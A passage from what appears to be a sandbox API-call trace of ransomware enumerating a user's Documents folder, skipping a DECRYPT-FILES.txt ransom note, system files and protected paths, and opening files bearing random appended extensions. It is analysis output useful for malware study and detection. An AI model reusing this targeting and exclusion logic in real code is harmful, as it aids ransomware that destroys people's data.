HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.325] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0185.325] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\*" [0185.325] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdfafcb60, ftCreationTime.dwHighDateTime=0x1d4caad, ftLastAccessTime.dwLowDateTime=0xf12b9d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf12b9d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0185.325] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.325] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdfafcb60, ftCreationTime.dwHighDateTime=0x1d4caad, ftLastAccessTime.dwLowDateTime=0xf12b9d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf12b9d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.325] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.325] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.325] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf12b9d60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf12b9d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf12b9d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.325] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.325] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.325] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.325] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.325] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.326] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.326] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.326] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.326] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.326] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.326] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.326] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.326] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.326] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.326] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.326] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0185.326] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.326] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" [0185.326] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\0a16c9.tmp" [0185.326] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.326] CloseHandle (hObject=0x0) returned 0 [0185.326] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.326] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26eaa870, ftCreationTime.dwHighDateTime=0x1d4c779, ftLastAccessTime.dwLowDateTime=0x9aca3c20, ftLastAccessTime.dwHighDateTime=0x1d4cfa7, ftLastWriteTime.dwLowDateTime=0xae87bd40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x14d8d, dwReserved0=0x0, dwReserved1=0x0, cFileName="52sYE55ED9y1bqufgLex.pdf.q21O", cAlternateFileName="52SYE5~1.Q21")) returned 1 [0185.326] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf.q21O", lpString2="DECRYPT-FILES.txt") returned -1 [0185.327] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf.q21O", lpString2="autorun.inf") returned -1 [0185.327] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf.q21O", lpString2="boot.ini") returned -1 [0185.327] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf.q21O", lpString2="desktop.ini") returned -1 [0185.327] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf.q21O", lpString2="ntuser.dat") returned -1 [0185.327] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf.q21O", lpString2="iconcache.db") returned -1 [0185.327] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf.q21O", lpString2="bootsect.bak") returned -1 [0185.327] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf.q21O", lpString2="ntuser.dat.log") returned -1 [0185.327] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf.q21O", lpString2="thumbs.db") returned -1 [0185.327] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf.q21O", lpString2="Bootfont.bin") returned -1 [0185.327] lstrlenW (lpString="52sYE55ED9y1bqufgLex.pdf.q21O") returned 29 [0185.327] lstrcmpiW (lpString1="q21O", lpString2="lnk") returned 1 [0185.327] lstrcmpiW (lpString1="q21O", lpString2="exe") returned 1 [0185.327] lstrcmpiW (lpString1="q21O", lpString2="sys") returned -1 [0185.327] lstrcmpiW (lpString1="q21O", lpString2="dll") returned 1 [0185.327] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0185.327] lstrlenW (lpString="52sYE55ED9y1bqufgLex.pdf.q21O") returned 29 [0185.327] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" [0185.327] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpString2="52sYE55ED9y1bqufgLex.pdf.q21O" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\52sYE55ED9y1bqufgLex.pdf.q21O") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\52sYE55ED9y1bqufgLex.pdf.q21O" [0185.327] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.327] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\52sYE55ED9y1bqufgLex.pdf.q21O" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\52sye55ed9y1bqufglex.pdf.q21o"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.328] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=85389) returned 1 [0185.328] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.328] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.328] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.329] CloseHandle (hObject=0x270) returned 1 [0185.329] CloseHandle (hObject=0x26c) returned 1 [0185.329] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.329] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8899f8e0, ftCreationTime.dwHighDateTime=0x1d4cc02, ftLastAccessTime.dwLowDateTime=0x6a263490, ftLastAccessTime.dwHighDateTime=0x1d4c78a, ftLastWriteTime.dwLowDateTime=0xae8c8000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x58e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcdcPPw5PxakniwP.docx.rsFJoR", cAlternateFileName="ACDCPP~1.RSF")) returned 1 [0185.329] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx.rsFJoR", lpString2="DECRYPT-FILES.txt") returned -1 [0185.329] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx.rsFJoR", lpString2="autorun.inf") returned -1 [0185.329] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx.rsFJoR", lpString2="boot.ini") returned -1 [0185.329] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx.rsFJoR", lpString2="desktop.ini") returned -1 [0185.329] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx.rsFJoR", lpString2="ntuser.dat") returned -1 [0185.329] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx.rsFJoR", lpString2="iconcache.db") returned -1 [0185.329] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx.rsFJoR", lpString2="bootsect.bak") returned -1 [0185.329] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx.rsFJoR", lpString2="ntuser.dat.log") returned -1 [0185.329] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx.rsFJoR", lpString2="thumbs.db") returned -1 [0185.329] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx.rsFJoR", lpString2="Bootfont.bin") returned -1 [0185.329] lstrlenW (lpString="AcdcPPw5PxakniwP.docx.rsFJoR") returned 28 [0185.329] lstrcmpiW (lpString1="rsFJoR", lpString2="lnk") returned 1 [0185.329] lstrcmpiW (lpString1="rsFJoR", lpString2="exe") returned 1 [0185.329] lstrcmpiW (lpString1="rsFJoR", lpString2="sys") returned -1 [0185.329] lstrcmpiW (lpString1="rsFJoR", lpString2="dll") returned 1 [0185.329] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0185.329] lstrlenW (lpString="AcdcPPw5PxakniwP.docx.rsFJoR") returned 28 [0185.329] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" [0185.329] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpString2="AcdcPPw5PxakniwP.docx.rsFJoR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\AcdcPPw5PxakniwP.docx.rsFJoR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\AcdcPPw5PxakniwP.docx.rsFJoR" [0185.329] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.330] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\AcdcPPw5PxakniwP.docx.rsFJoR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\acdcppw5pxakniwp.docx.rsfjor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.330] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=22755) returned 1 [0185.330] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.330] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.331] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.331] CloseHandle (hObject=0x270) returned 1 [0185.331] CloseHandle (hObject=0x26c) returned 1 [0185.331] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.331] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae87bd40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae87bd40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae87bd40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.331] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.331] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb45722d0, ftCreationTime.dwHighDateTime=0x1d4cf5b, ftLastAccessTime.dwLowDateTime=0xae9d29a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae9d29a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hvIpcfVk", cAlternateFileName="")) returned 1 [0185.331] lstrcmpW (lpString1="hvIpcfVk", lpString2=".") returned 1 [0185.331] lstrcmpW (lpString1="hvIpcfVk", lpString2="..") returned 1 [0185.331] lstrcatW (in: lpString1="hvIpcfVk", lpString2="\\" | out: lpString1="hvIpcfVk\\") returned="hvIpcfVk\\" [0185.331] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpString2="hvIpcfVk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" [0185.331] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\Program Files") returned 0x0 [0185.332] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch=":\\Windows") returned 0x0 [0185.332] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\Games\\") returned 0x0 [0185.332] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.332] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.332] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.332] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.332] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.332] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\All Users") returned 0x0 [0185.332] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.332] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.332] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.332] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="AhnLab") returned 0x0 [0185.332] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.332] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0185.332] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.332] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\\\0a16c9.tmp") returned 95 [0185.332] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0185.335] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0185.335] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.335] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\\\DECRYPT-FILES.txt") returned 102 [0185.335] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.335] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0185.335] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\*" [0185.335] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb45722d0, ftCreationTime.dwHighDateTime=0x1d4cf5b, ftLastAccessTime.dwLowDateTime=0xf12b9d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf12b9d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0185.336] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.336] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb45722d0, ftCreationTime.dwHighDateTime=0x1d4cf5b, ftLastAccessTime.dwLowDateTime=0xf12b9d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf12b9d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.336] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.336] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.336] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf12b9d60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf12b9d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf12b9d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.336] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.336] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.336] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.336] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.336] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.336] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.336] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.336] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.336] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.336] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.336] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.336] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.336] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.336] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.336] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.336] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS 